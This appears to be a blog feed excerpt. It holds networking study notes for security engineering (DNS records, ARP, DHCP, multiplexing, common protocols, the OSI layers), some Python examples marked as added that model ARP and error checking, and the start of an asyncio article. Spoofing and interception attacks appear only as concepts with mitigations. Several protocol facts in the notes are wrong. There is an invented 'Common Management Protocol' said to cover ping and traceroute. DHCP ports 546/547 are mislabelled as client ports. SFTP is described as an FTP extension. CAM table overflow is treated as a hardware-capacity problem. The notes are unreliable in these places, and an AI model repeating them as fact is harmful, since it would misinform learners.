<li><p>Start of Authority (SOA) - This record is used to define the primary DNS server for a domain, as well as other information such as the administrative contact and the serial number of the zone file.</p>
</li>
<li><p>IP addresses (A and AAAA) - These records are used to map a hostname to an IPv4 or IPv6 address respectively.</p>
</li>
<li><p>SMTP mail exchangers (MX) - These records are used to identify the mail servers for a domain so that email can be delivered to the correct server.</p>
</li>
<li><p>Name servers (NS) - These records are used to identify the DNS servers that are responsible for a domain so that DNS queries can be forwarded to the correct server.</p>
</li>
<li><p>Pointers for reverse DNS lookups (PTR) - These records are used to map an IP address to a hostname in a reverse DNS lookup.</p>
</li>
<li><p>Domain name aliases (CNAME) - These records are used to create an alias for a hostname so that multiple hostnames can resolve to the same IP address.</p>
</li>
</ol>
<p>These are the most common DNS configurations, but there are other types of records as well, such as SRV, TXT and others that can be used for specific purposes.</p>
<blockquote>
<p>It is important to note that DNS configurations can be complex and require a good understanding of the DNS protocol and the specific needs of the domain. Misconfiguring DNS records can cause problems such as email delivery failures, web server failures, or even complete loss of internet access.</p>
</blockquote>
<h3 id="heading-arp-address-resolution-protocol"><strong>ARP (Address Resolution Protocol):</strong></h3>
<ul>
<li><p>is a protocol used to map a network layer protocol address (such as an IP address) to a link layer (MAC) address on a local network. ARP is used to determine the link-layer (MAC) address corresponding to a given network-layer (IP) address, and it is typically used when a host wants to communicate with another host on a LAN.</p>
</li>
<li><p>When a host wants to communicate with another host on a LAN, it needs to know the MAC address of the destination host. It does this by broadcasting an ARP request message, which contains the IP address of the destination host, to all devices on the LAN. The device with the matching IP address responds with its MAC address, which is then used by the sender to send the data.</p>
</li>
<li><p>It's important to note that ARP is a broadcast protocol and it is not authenticated, which means that it can be subject to ARP spoofing attacks, where an attacker sends fake ARP messages to map its own MAC address to the IP address of another device on the network, allowing the attacker to intercept and possibly modify network traffic. To prevent this, techniques such as static ARP entries, ARP protection and DHCP snooping can be used.</p>
</li>
</ul>
<h3 id="heading-dhcp-dynamic-host-configuration-protocol"><strong>DHCP (Dynamic Host Configuration Protocol):</strong></h3>
<ul>
<li><p>is a network protocol used to dynamically assign IP addresses, subnet masks, default gateways, and other network configuration parameters to devices on a network. It operates over UDP (User Datagram Protocol) on ports 67 and 68. DHCP allows devices to automatically obtain IP addresses and other network configuration information, eliminating the need for manual configuration.</p>
</li>
<li><p>When a device wants to obtain an IP address, it sends a broadcast message called DHCPDISCOVER to the network, asking for an available IP address. The DHCP server, which is typically a router or a dedicated DHCP server, receives the DHCPDISCOVER message and responds with a DHCPOFFER message, which contains an available IP address and other network configuration information.</p>
</li>
<li><p>The device then sends a DHCPREQUEST message to the DHCP server, requesting the offered IP address. The DHCP server then sends a DHCPACK message to the device, confirming that the IP address has been assigned to the device.</p>
</li>
<li><p>It's important to note that DHCP also has several other message types like DHCPNAK, DHCPRELEASE, DHCPINFORM, and DHCPFORCERENEW which are used for specific purposes like indicating that an IP address is not available, releasing an IP address or renewing an IP address.</p>
</li>
<li><p>DHCP is widely used in networks to automatically configure IP addresses for devices, which is useful for networks that have a high turnover of devices or for devices that are not easily configured manually. However, DHCP can also be subject to DHCP spoofing attacks, where an attacker sends fake DHCPOFFER messages to assign a rogue IP address to a device, which can be mitigated by using DHCP snooping.</p>
</li>
</ul>
<h3 id="heading-multiplex"><strong>Multiplex:</strong></h3>
<ul>
<li><p>Multiplexing is the process of simultaneously transmitting multiple signals over a single communication channel. There are several types of multiplexing techniques, including:</p>
<ol>
<li><p>Time-division multiplexing (TDM) - In TDM, each signal is assigned a specific time slot within a larger time frame, and the time slots are used to transmit each signal in turn. This allows multiple signals to be transmitted over a single channel, by effectively "sharing" the channel over time.</p>
</li>
<li><p>Frequency-division multiplexing (FDM) - In FDM, each signal is assigned a specific frequency band within a larger frequency range, and the frequency bands are used to transmit each signal simultaneously. This allows multiple signals to be transmitted over a single channel, by effectively "sharing" the channel over frequency.</p>
</li>
<li><p>Statistical multiplexing - In statistical multiplexing, the channel capacity is adaptively shared among multiple signals, based on the instantaneous demand of each signal. This allows the channel to be used more efficiently, as the capacity is allocated to the signals that need it most.</p>
</li>
<li><p>Code-division multiplexing (CDM) - In CDM, each signal is assigned a unique code and all signals are transmitted simultaneously over the same channel by using the unique codes to distinguish the signals from one another.</p>
</li>
</ol>
</li>
</ul>
<p>These are the most common types of multiplexing, but there are other types as well. It's important to note that multiplexing can be useful in a variety of contexts, such as telecommunications, computer networks, and other applications where multiple signals need to be transmitted over a single channel.</p>
<h3 id="heading-traceroute"><strong>Traceroute:</strong></h3>
<ul>
<li>Traceroute is a network troubleshooting tool used to trace the path that a packet takes from the source to the destination and to identify any bottlenecks or failures along the way. It uses a combination of ICMP Echo Request (ping), UDP packets and TCP SYN packets to determine the path and the time it takes for each hop (router) to respond. It uses the hop limit, or Time-to-Live (TTL), field in the IP header to control the number of hops that the packet can make before it is discarded. The initial hop limit is typically set to 64 for *nix systems and 128 for Windows.</li>
</ul>
<h3 id="heading-nmap"><strong>Nmap:</strong></h3>
<ul>
<li>Nmap is a network discovery and security auditing tool that can be used to identify hosts and services on a computer network and discover vulnerabilities. It can be used to scan a single host, a range of IP addresses, or an entire network. It can be used to identify open ports on a host and to determine the operating system and version of the host. It can also be used to discover vulnerabilities and conduct security assessments.</li>
</ul>
<h3 id="heading-intercepts-pitm-person-in-the-middle"><strong>Intercepts (PitM - Person in the middle):</strong></h3>
<ul>
<li>A "man-in-the-middle" (MitM) attack is a type of cyberattack where an attacker intercepts and alters the communication between two parties. This can be done by intercepting traffic between a client and a server, by intercepting DNS lookups, or by using other methods. To mitigate MitM attacks, it is important to use encryption and to use PKI (Public Key Infrastructure) to authenticate the identity of the parties involved in the communication.</li>
</ul>
<h3 id="heading-vpn"><strong>VPN:</strong></h3>
<ul>
<li>A Virtual Private Network (VPN) allows users to securely connect to a private network over the internet. VPNs use encryption and authentication to secure the connection and protect the data being transmitted. While VPNs can be used to protect traffic from being seen by the ISP, it is important to note that the traffic is still visible to the VPN provider.</li>
</ul>
<h3 id="heading-tor"><strong>Tor:</strong></h3>
<ul>
<li>Tor (The Onion Router) is a network that is designed to provide anonymity and privacy to its users. It uses a system of relays to route traffic through multiple layers of encryption, making it difficult to trace the origin of the traffic. While Tor can make it difficult for investigators to find individuals on the network, they may still be able to identify the individual by analyzing other factors such as the timing, location, and type of traffic being sent.</li>
</ul>
<h3 id="heading-proxy"><strong>Proxy:</strong></h3>
<ul>
<li>A proxy is a server that acts as an intermediary between a client and a server. Proxies can be used to improve security and privacy, but they are not foolproof solutions. Using multiple proxies, or "chaining" them, will not necessarily provide more security or privacy. It is also important to note that the traffic is still visible to the proxy server.</li>
</ul>
<h3 id="heading-bgbup"><strong>BGP:</strong></h3>
<ul>
<li>Border Gateway Protocol (BGP) is a protocol that is used to exchange routing information between routers in a network. BGP is used to connect different networks and is a crucial protocol that helps to hold the internet together.</li>
</ul>
<h3 id="heading-network-traffic-tools"><strong>Network traffic tools:</strong></h3>
<ul>
<li>Wireshark, Tcpdump, and Burp Suite are all tools that can be used to analyze and capture network traffic. Wireshark is a popular tool that allows you to capture, analyze and filter network traffic. Tcpdump is a command-line tool that is used to capture and analyze network packets. Burp Suite is a tool for web application security testing; it contains a proxy, spider and scanner.</li>
</ul>
<h3 id="heading-https"><strong>HTTP/S:</strong></h3>
<ul>
<li>HTTP (Hypertext Transfer Protocol) is a protocol that is used to transfer data over the internet. HTTPS (HTTP Secure) is an extension of HTTP that uses SSL/TLS to encrypt the data being transmitted; it uses port 443.</li>
</ul>
<h3 id="heading-ssltls-ssl-secure-sockets-layer-and-tls-transport-layer-security"><strong>SSL/TLS: SSL (Secure Sockets Layer) and TLS (Transport Layer Security)</strong></h3>
<ul>
<li>are protocols that are used to encrypt the data being transmitted over a network. They are commonly used to secure web traffic, email and other types of internet communication. It's important to understand the various algorithms and protocols used in SSL/TLS, including handshakes, encryption, signing, certificate authorities, and trust systems. There are many known vulnerabilities in SSL/TLS, like POODLE, BEAST, CRIME, BREACH, and HEARTBLEED, that have been discovered and patched over the years.</li>
</ul>
<h3 id="heading-tcpudp"><strong>TCP/UDP:</strong></h3>
<ul>
<li>TCP (Transmission Control Protocol) and UDP (User Datagram Protocol) are transport layer protocols that are used to transmit data over a network. TCP is a connection-oriented protocol that guarantees the delivery of data by retransmitting lost packets, while UDP is a connectionless protocol that does not guarantee delivery. Web traffic, chat, VoIP, and traceroute are examples of applications that use TCP or UDP. Streaming applications can slow down network connections that use TCP.</li>
</ul>
<h3 id="heading-cmp"><strong>CMP:</strong></h3>
<ul>
<li>CMP stands for Common Management Protocol, and it is used for managing network devices. The most common CMPs are ping and traceroute. Ping is a utility used to check if a specific IP address is reachable. Traceroute is a utility used to trace the path that a packet takes to reach a destination.</li>
</ul>
<h3 id="heading-mail"><strong>Mail:</strong></h3>
<ul>
<li>SMTP (Simple Mail Transfer Protocol) is used for sending emails; it uses ports 25, 587 and 465. IMAP (Internet Message Access Protocol) is used for accessing emails on a server; it uses ports 143 and 993. POP3 (Post Office Protocol version 3) is used for retrieving emails from a server; it uses ports 110 and 995.</li>
</ul>
<h3 id="heading-ssh"><strong>SSH:</strong></h3>
<ul>
<li>SSH (Secure Shell) is a protocol that is used to securely log into remote computers. SSH uses port 22 and it uses asymmetric encryption to exchange a symmetric key.</li>
</ul>
<h3 id="heading-telnet"><strong>Telnet:</strong></h3>
<ul>
<li>Telnet is a protocol that allows remote communication with hosts. It uses ports 23 and 992. Telnet transmits data in clear text, so it is not secure.</li>
</ul>
<h3 id="heading-arp"><strong>ARP:</strong></h3>
<ul>
<li>ARP is the Address Resolution Protocol. It is used to map an IP address to a MAC address on a LAN. When a device wants to communicate with another device on the LAN, it will first check its ARP cache to see if it already knows the MAC address associated with the IP address. If it doesn't, it will broadcast an ARP request packet asking "Who has IP address X? Tell Y" where X is the IP address it is trying to reach and Y is its own IP address. The device with IP address X will respond with its MAC address, and the sender will then update its ARP cache with this information.</li>
</ul>
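<p>The request and reply described above, modelled as an added example (not code from the original post): it builds the Ethernet/ARP frames with <code>struct</code>, lets the owner of the address answer, and updates the requester's cache. The <code>Host</code> class, the addresses, and the rule of caching only replies to requests the host itself sent are assumptions of this example.</p>

```python
import struct

# Ethernet II header followed by an ARP body for IPv4 over Ethernet (RFC 826).
ETH_HEADER = struct.Struct("!6s6sH")        # destination MAC, source MAC, EtherType
ARP_BODY = struct.Struct("!HHBBH6s4s6s4s")  # htype, ptype, hlen, plen, op, sha, spa, tha, tpa
ETHERTYPE_ARP = 0x0806
OP_REQUEST, OP_REPLY = 1, 2
BROADCAST = b"\xff" * 6


def mac_bytes(text):
    return bytes(int(part, 16) for part in text.split(":"))


def ip_bytes(text):
    return bytes(int(part) for part in text.split("."))


def mac_text(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip_text(raw):
    return ".".join(str(b) for b in raw)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    # A request is broadcast at layer 2; a reply goes straight back to the asker.
    eth_dst = BROADCAST if op == OP_REQUEST else target_mac
    header = ETH_HEADER.pack(eth_dst, sender_mac, ETHERTYPE_ARP)
    body = ARP_BODY.pack(1, 0x0800, 6, 4, op,
                         sender_mac, sender_ip, target_mac, target_ip)
    return header + body


def parse_arp(frame):
    header = frame[:ETH_HEADER.size]
    body = frame[ETH_HEADER.size:ETH_HEADER.size + ARP_BODY.size]
    if len(header) != ETH_HEADER.size or len(body) != ARP_BODY.size:
        raise ValueError("truncated frame")
    eth_dst, _eth_src, ethertype = ETH_HEADER.unpack(header)
    if ethertype != ETHERTYPE_ARP:
        raise ValueError("not an ARP frame")
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = ARP_BODY.unpack(body)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("not Ethernet/IPv4 ARP")
    return {"eth_dst": eth_dst, "op": op,
            "sha": sha, "spa": spa, "tha": tha, "tpa": tpa}


class Host:
    """Hypothetical LAN host with an ARP cache (constructed for this example)."""

    def __init__(self, mac, ip):
        self.mac, self.ip = mac_bytes(mac), ip_bytes(ip)
        self.cache = {}       # maps IP text to MAC text
        self.pending = set()  # IPs this host has asked about

    def resolve(self, target_ip):
        """Return (cached MAC, None) or (None, request frame to broadcast)."""
        if target_ip in self.cache:
            return self.cache[target_ip], None
        self.pending.add(target_ip)
        request = build_arp(OP_REQUEST, self.mac, self.ip,
                            bytes(6), ip_bytes(target_ip))
        return None, request

    def receive(self, frame):
        """Handle one frame; return a reply frame or None."""
        pkt = parse_arp(frame)
        if pkt["eth_dst"] not in (BROADCAST, self.mac):
            return None
        if pkt["op"] == OP_REQUEST and pkt["tpa"] == self.ip:
            # "Who has X? Tell Y": we are X, so answer Y directly.
            return build_arp(OP_REPLY, self.mac, self.ip, pkt["sha"], pkt["spa"])
        if pkt["op"] == OP_REPLY and pkt["tpa"] == self.ip:
            answered = ip_text(pkt["spa"])
            # ARP carries no authentication, so this model only caches
            # answers to questions it actually asked.
            if answered in self.pending:
                self.pending.discard(answered)
                self.cache[answered] = mac_text(pkt["sha"])
        return None


def run_exchange():
    """Y asks for X on a LAN that also has an uninvolved bystander."""
    y = Host("aa:bb:cc:00:00:10", "192.168.1.10")
    x = Host("aa:bb:cc:00:00:20", "192.168.1.20")
    bystander = Host("aa:bb:cc:00:00:30", "192.168.1.30")
    _, request = y.resolve("192.168.1.20")
    replies = [host.receive(request) for host in (x, bystander)]
    for reply in replies:
        if reply is not None:
            y.receive(reply)
    return y, replies


if __name__ == "__main__":
    requester, _ = run_exchange()
    print(requester.cache)
```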
<h3 id="heading-dhcp"><strong>DHCP:</strong></h3>
<ul>
<li>DHCP (Dynamic Host Configuration Protocol) is used to dynamically assign IP addresses to devices on a network. DHCP uses ports 67 and 68 for servers and ports 546 and 547 for clients. DHCP can be configured to assign addresses automatically, in which case it leases IP addresses to devices and remembers the MAC and IP pairing in a table, or it can be configured to assign addresses manually, where static IP addresses are set by an administrator.</li>
</ul>
<h3 id="heading-irc"><strong>IRC:</strong></h3>
<ul>
<li>IRC (Internet Relay Chat) is a protocol for real-time text communication. It is used by hackers to create botnets, which are networks of infected computers that are controlled remotely.</li>
</ul>
<h3 id="heading-ftpsftp"><strong>FTP/SFTP:</strong></h3>
<ul>
<li>FTP (File Transfer Protocol) is used to transfer files between computers. It uses port 21. SFTP (Secure File Transfer Protocol) is an extension of FTP that provides a secure way to transfer files. It uses port 22, the same port as SSH.</li>
</ul>
<p><strong>HTTP headers</strong> are a part of the HTTP request and response that provide additional information about the request or response. They contain various information, such as the type of request (verb), the requested path, the HTTP version, the domain, the accepted language, the accepted character set, the accepted encoding, the connection status (close or keep-alive), the referrer, the return address and the expected size. These headers are used by servers and clients to understand the request and provide the appropriate response. They are also used by web developers to optimize the performance of their web pages and by security professionals to detect and prevent attacks.</p>
<p><strong>Broadcast domains</strong> refer to the area of a network where broadcast traffic can be heard by all devices. Collision domains refer to the area of a network where a collision can occur, such as on a shared Ethernet network.</p>
<p><strong>A Root store</strong> is a collection of trusted root certificates used to verify the authenticity of digital certificates used in SSL/TLS connections.</p>
<p><strong>CAM table overflow</strong> occurs when a switch's Content Addressable Memory (CAM) table reaches its maximum capacity and can no longer store new MAC addresses. This can cause issues with network connectivity and is typically resolved by upgrading the switch or increasing its CAM table size.</p>
<hr />
<p>Well, here we are. Finally done with networking. I encourage you to read deeply to understand networking before jumping to the next part.</p>
<p>In the next article, we are going to dive into web applications.</p>
<p><a target="_blank" href="https://github.com/gracenolan/Notes/blob/master/interview-study-notes-for-security-engineering.md#networking">The Gracenolan notes</a></p>
<p><a target="_blank" href="https://github.com/WarrenMu">Follow me on github</a></p>
]]></content:encoded></item><item><title><![CDATA[Security engineering  basing on gracenolan notes. part 1]]></title><description><![CDATA[Networking
what is computer networking?

Computer networking is the practice of linking computer devices together to facilitate communication and the sharing of resources. This can be done through wired or wireless connections and can be accomplished...]]></description><link>https://blog.oscakampala.org/security-engineering-basing-on-gracenolan-notes-part-1</link><guid isPermaLink="true">https://blog.oscakampala.org/security-engineering-basing-on-gracenolan-notes-part-1</guid><category><![CDATA[#cybersecurity]]></category><category><![CDATA[CyberSec]]></category><category><![CDATA[cyber security]]></category><category><![CDATA[Open Source]]></category><category><![CDATA[opensource]]></category><dc:creator><![CDATA[WarrenMu]]></dc:creator><pubDate>Thu, 26 Jan 2023 13:59:36 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1674740498677/87e5fb64-80fc-4840-b980-263bf74b4b7d.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h3 id="heading-networking">Networking</h3>
<p><strong>what is computer networking?</strong></p>
<ul>
<li>Computer networking is the practice of linking computer devices together to facilitate communication and the sharing of resources. This can be done through wired or wireless connections and can be accomplished using various protocols and technologies. Networking enables computers to share data and resources, including access to devices such as printers and scanners. It also allows for remote access and communication, enabling users to access resources on other devices or networks. Common examples of computer networks include local area networks (LANs), wide area networks (WANs), and the internet.</li>
</ul>
<p><strong>Let's look at the OSI model.</strong></p>
<p>The OSI (Open Systems Interconnection) model is a framework that describes how different protocols and technologies work together to enable communication in a networked environment. The OSI model consists of seven layers, each with a specific function and role in the communication process:</p>
<ul>
<li><p><strong>Physical Layer</strong>: responsible for transmitting raw data bits over a communication channel.</p>
</li>
<li><p><strong>Data Link Layer</strong>: responsible for creating a reliable link between two devices on a network.</p>
</li>
<li><p><strong>Network Layer</strong>: responsible for routing data packets across multiple networks.</p>
</li>
<li><p><strong>Transport Layer</strong>: responsible for ensuring that data is delivered reliably and in the correct order.</p>
</li>
<li><p><strong>Session Layer</strong>: responsible for establishing, maintaining, and terminating communication sessions between devices.</p>
</li>
<li><p><strong>Presentation</strong> <strong>Layer</strong>: responsible for translating and formatting data so that it can be understood by the application layer.</p>
</li>
</ul>
<p><strong>N.B</strong></p>
<p>Application Layer: responsible for providing a user interface and a set of protocols that applications can use to communicate over the network.</p>
<p><strong>Why the OSI model?</strong></p>
<p>The OSI model is useful as a reference model and helps to understand the different components and protocols that are involved in communication between devices in a networked environment.</p>
<p>Let's look at each layer of the OSI model...</p>
<p><strong>Physical; layer 1 (Bits over fiber):</strong></p>
<ul>
<li>The physical layer, also known as layer 1 in the OSI model, is the lowest and is responsible for transmitting raw data bits over a physical medium. It defines the electrical, mechanical, and functional characteristics of the interface between the networked device and the transmission medium. It defines the physical connectors, signaling, and voltage levels used to transmit data. In the case of transmitting bits over fiber, the physical layer would define the type of fiber-optic cable and the method of transmitting data over it, such as using infrared or visible light. It also defines the connector types, such as LC, SC, or ST, used to connect the devices to the cable, as well as the speed of data transfer.</li>
</ul>
<p><strong>Datalink; layer 2 (Error checking and frame synchronisation):</strong></p>
<ul>
<li><p>The data link layer, also known as layer 2 in the OSI model, is the second layer and is responsible for creating a reliable link between two devices on a network. It provides error checking and correction to ensure that data is transmitted accurately and also performs frame synchronization.</p>
</li>
<li><p>Error checking is done by using various techniques such as parity bit, cyclic redundancy check (CRC), or checksums, which are added to the data frames to detect errors that may have occurred during transmission. These techniques allow the receiver to detect errors and request the retransmission of the corrupted data.</p>
</li>
<li><p>Frame synchronization is the process of aligning the data frames so that the receiver can properly interpret the received data. This is done by adding special characters called start and stop bits, or by using a special protocol such as a preamble or a frame delimiter.</p>
</li>
<li><p>The data link layer also assigns logical addresses (MAC addresses) to each device on the network, which are used to identify the source and destination of each data frame. This layer also handles the flow control, which ensures that the sender does not overwhelm the receiver with too much data at once.</p>
</li>
</ul>
<p>Overall, the data link layer provides a reliable connection between two devices on a network by detecting and correcting errors, and by properly aligning and sequencing the data frames.</p>
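<p>The three error-checking techniques named above do not catch the same errors. The following added example (not from the original post) runs a parity bit, a 16-bit ones' complement checksum and a CRC-32 frame check over the same constructed payload and three kinds of corruption. The payload, the choice of the Internet-style checksum and the use of <code>zlib.crc32</code> are assumptions of this example.</p>

```python
import zlib

PAYLOAD = b"transfer 100 to account 42"  # constructed sample data


def parity_bit(data):
    """Even parity: 1 if the payload has an odd number of 1 bits."""
    return sum(bin(byte).count("1") for byte in data) % 2


def internet_checksum(data):
    """16-bit ones' complement sum of 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(int.from_bytes(data[i:i + 2], "big")
                for i in range(0, len(data), 2))
    while total // 65536:                      # fold the carries back in
        total = total % 65536 + total // 65536
    return 65535 - total


def add_fcs(payload):
    """Append a 4-byte CRC-32 frame check sequence to the payload."""
    return payload + zlib.crc32(payload).to_bytes(4, "little")


def check_fcs(frame):
    """Receiver side: recompute the CRC and compare it with the trailer."""
    payload, fcs = frame[:-4], frame[-4:]
    return zlib.crc32(payload).to_bytes(4, "little") == fcs


def flip_bits(data, positions):
    """Return a copy of data with the given bit positions inverted."""
    out = bytearray(data)
    for pos in positions:
        out[pos // 8] ^= 2 ** (pos % 8)
    return bytes(out)


def detects(original, received):
    """Which checks notice that `received` differs from `original`?"""
    trailer = add_fcs(original)[-4:]           # FCS computed by the sender
    return {
        "parity": parity_bit(original) != parity_bit(received),
        "checksum": internet_checksum(original) != internet_checksum(received),
        "crc32": not check_fcs(received + trailer),
    }


def run_cases(payload=PAYLOAD):
    cases = {
        "one bit flipped": flip_bits(payload, [3]),
        # An even number of flips leaves the parity bit unchanged.
        "two bits flipped": flip_bits(payload, [0, 9]),
        # Reordered words add up to the same sum, so the checksum is blind to it.
        "two 16-bit words swapped": payload[2:4] + payload[0:2] + payload[4:],
    }
    return {name: detects(payload, bad) for name, bad in cases.items()}


if __name__ == "__main__":
    for name, result in run_cases().items():
        print(name, result)
```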
<p><strong>Network; layer 3 (Routing):</strong></p>
<ul>
<li><p>The network layer, also known as layer 3 in the OSI model, is responsible for routing data packets across multiple networks. It is responsible for logical addressing, also known as IP addressing, and for determining the best path for data to travel from its source to its destination.</p>
</li>
<li><p>The network layer uses logical addresses, such as IP addresses, to identify devices on a network. It also uses routing protocols, such as OSPF, BGP, and RIP, to determine the best path for data to travel from its source to its destination. Routing protocols use algorithms to calculate the best path based on factors such as distance, bandwidth, and reliability.</p>
</li>
<li><p>The network layer also provides mechanisms for handling the fragmentation and reassembly of packets. Fragmentation occurs when a packet is too large to be transmitted over a particular link, and it needs to be divided into smaller packets before being sent. The network layer takes care of this process and also reassembles the packets at the destination.</p>
</li>
<li><p>The network layer also provides Quality of Service (QoS) mechanisms, which allow certain types of traffic to be given priority over others. This is important for real-time applications such as VoIP and video streaming.</p>
</li>
</ul>
<p>Overall, the network layer provides the necessary functionality for routing data packets across multiple networks, and for ensuring that data is delivered to its destination efficiently and reliably.</p>
<p><strong>Transport; layer 4 (TCP/UDP):</strong></p>
<ul>
<li><p>The transport layer, also known as layer 4 in the OSI model, is responsible for ensuring that data is delivered reliably and in the correct order. It provides logical communication between the applications running on different hosts and ensures that data is delivered error-free.</p>
</li>
<li><p>The transport layer uses two main protocols: TCP (Transmission Control Protocol) and UDP (User Datagram Protocol).</p>
</li>
<li><p>TCP is a connection-oriented protocol that establishes a reliable link between two devices before data is transmitted. It uses a three-way handshake to establish a connection and then uses flow control and error-checking mechanisms to ensure that data is transmitted accurately. TCP is used by applications that require a reliable connection, such as web browsing, file transfer, and email.</p>
</li>
<li><p>UDP, on the other hand, is a connectionless protocol that does not establish a connection before data is transmitted. It does not provide error checking or flow control, but it is faster and has less overhead than TCP. UDP is used by applications that do not require a reliable connection, such as streaming media, online gaming, and VoIP.</p>
</li>
<li><p>The transport layer also provides port numbers to identify different applications running on the same host and multiplexing and demultiplexing mechanism to ensure that the data is delivered to the right application.</p>
</li>
</ul>
<p>Overall, the transport layer provides the necessary functionality for ensuring that data is delivered reliably and in the correct order, and for providing logical communication between the applications running on different hosts.</p>
<p><strong>Application; layer 7 (and basically layers 5 &amp; 6) (includes API, HTTP, etc):</strong></p>
<ul>
<li><p>The application layer, also known as layer 7 in the OSI model, is the highest in the network stack and is responsible for directly interacting with the application or user. It includes protocols such as HTTP, FTP, and SMTP, and is responsible for providing a user interface for interacting with the network. It also includes application programming interfaces (APIs) which allow different software applications to communicate and share resources.</p>
</li>
<li><p>The application layer is responsible for providing the necessary functionality for the applications to access the network and exchange data. It defines the syntax, semantics, and synchronization of communication and the negotiation of any authentication and privacy scheme.</p>
</li>
<li><p>HTTP, the most widely used protocol on the internet, is used for communication between web browsers and web servers, and it allows for the exchange of hypertext documents. FTP (File Transfer Protocol) is used for transferring files between computers, and SMTP (Simple Mail Transfer Protocol) is used for sending and receiving emails.</p>
</li>
<li><p>In many modern implementations, layers 5 and 6, the session and presentation layers respectively, have been subsumed into the application layer. The session layer, which was responsible for establishing, maintaining, and terminating communication sessions between devices, is now commonly included in the application layer. The presentation layer, which was responsible for translating and formatting data so that it can be understood by the application layer, is also often included in the application layer.</p>
</li>
</ul>
<p>Overall, the application layer provides a user interface for interacting with the network and enables the communication between different software applications and the network.</p>
<p>That's it for today. Next, we shall go through firewalls, NAT, DNS, etc...</p>
<p><a target="_blank" href="https://github.com/gracenolan/Notes/blob/master/">Gracenolan notes on github</a></p>
<p>Follow me on twitter: <a target="_blank" href="https://twitter.com/WarrenMu_">WarrenMu</a></p>
]]></content:encoded></item><item><title><![CDATA[Understanding Asyncio]]></title><description><![CDATA[Asynchronous programming in python is among the most interesting but also the most daunting of things to learn. Not only in python, but generally across languages that support the paradigm. Personally, it took me about a year (the whole of last year)...]]></description><link>https://blog.oscakampala.org/understanding-asyncio</link><guid isPermaLink="true">https://blog.oscakampala.org/understanding-asyncio</guid><category><![CDATA[asyncio]]></category><category><![CDATA[asynchronous]]></category><category><![CDATA[Python]]></category><dc:creator><![CDATA[TobiasHT]]></dc:creator><pubDate>Mon, 09 Jan 2023 10:34:04 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1673213383158/1df4db80-6bb2-406a-a1a9-81b0ded2b4f1.webp" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Asynchronous programming in python is among the most interesting but also the most daunting of things to learn. Not only in python, but generally across languages that support the paradigm. Personally, it took me about a year (the whole of last year) trying to learn and re-learn the various concepts that were involved, and I remember how frustrated I was throughout the journey. My hope is that I can help shorten your study cycle by trying to summarize the main concepts that I learned along the way and try to make them more palatable for you to understand. Note that this is not an asyncio tutorial but helps you understand its need and its implementation. I try to provide links to the relevant source that I think will help you master asyncio more.</p>
<h3 id="heading-introduction">Introduction</h3>
<p>According to <a target="_blank" href="https://en.wikipedia.org/wiki/Asynchrony_(computer_programming)">Wikipedia</a></p>
<blockquote>
<p>Asynchrony, in computer programming, refers to the occurrence of events independent of the main program flow and ways to deal with such events.</p>
</blockquote>
<p>In simple terms, this means that the program executes tasks according to which task is ready to run and not following a strict order of tasks. To understand this better, let's use an analogy of the school cook serving lunch to the students that have lined up in a queue. The lunch menu has rice, matooke (bananas), fish, beef and Gnut sauce. The students can pick whatever they wish from the menu. If one student being served by the cook could not make up their mind on whether to have the fish or the beef, then they would be wasting time in the queue and blocking the other students from being served. To unblock the queue, the other students need to be allowed to cut in front of the thinking student who is still trying to make up his mind so that they can be served by the cook, and later the cook would serve the thinking student after he's made up his mind. This is the same case when it comes to software.</p>
<p>The main reason for asynchronous programming is to speed up the execution of a program or programs by allowing the computer to run multiple execution contexts at the same time and creating non-blocking execution environments. The execution contexts can be an operating system process (OS process), operating system thread (OS thread) or <a target="_blank" href="https://en.wikipedia.org/wiki/Green_thread">green thread</a>.</p>
<h3 id="heading-threads-and-processes">Threads and Processes</h3>
<p>Again <a target="_blank" href="https://en.wikipedia.org/wiki/Process_(computing)">Wikipedia</a> defines processes as</p>
<blockquote>
<p>In computing, a process is the instance of a computer program that is being executed by one or many threads.</p>
</blockquote>
<p>Basically, a process is a uniquely running program. A single program can be run in many processes, just like one can have many windows of their text editor open. Depending on the operating system, a process can also have the ability to start other processes of different programs or even launch child processes from itself. In python, we can work with multiple processes using the standard library multiprocessing module.</p>
<p>Depending on the operating system, programs are implemented as a collection of threads. According to <a target="_blank" href="https://en.wikipedia.org/wiki/Thread_(computing)">Wikipedia</a></p>
<blockquote>
<p>In computer science, a thread of execution is the smallest sequence of programmed instructions that can be managed independently by a scheduler, which is typically a part of the operating system</p>
</blockquote>
<p>Threads are like internal virtual machines inside a program that run tasks. Theoretically, a program can start as many threads as it wishes. In practice, the number of threads is limited by the memory available.</p>
<p>Both processes and threads were designed to solve the problem at hand, which is to enable us to run multiple tasks at the same time. However, they both come at an expensive cost. First of all, they both take up a huge amount of space, which limits the number of execution contexts we can have. In the case of a web server, if we were to start a new process or new thread for every client that connected to our server, the performance of the server would start slowing down by the time we reach 2000 processes or threads on some operating systems, since memory would be eaten up immensely. Also, the barrier between processes exerts a heavy toll, since there's an overhead for 2 processes to communicate. And although threads do not have the communication barrier that processes have, the <a target="_blank" href="https://en.wikipedia.org/wiki/Context_switch">context switching</a> between threads introduces a significant overhead. Context switching is basically what the operating system does while juggling multiple threads on a single CPU or core. It has to save the state of the currently running thread in memory and then load a new thread to run for some time, then again save that thread's context, stop it and load a new thread and keep switching between them like that. All of this has significant overhead.</p>
<p>And when it gets to multithreading in python, it is heavily impacted by the global interpreter lock (<a target="_blank" href="https://realpython.com/python-gil/">GIL</a>). The GIL only allows one python thread to run at a time, which hinders optimizations that might be provided by modern operating systems for multithreaded programs. And since only one python thread can be run at a time, it means python will cut short a thread right in the middle of its important execution such as validating a user or reading from a database. This is called <a target="_blank" href="https://en.wikipedia.org/wiki/Preemption_(computing)#PREEMPTIVE">preemptive</a> multithreading and it's the cause of expensive context switches. It also might lead to some software faults if not handled carefully.</p>
<h3 id="heading-green-threads">Green threads</h3>
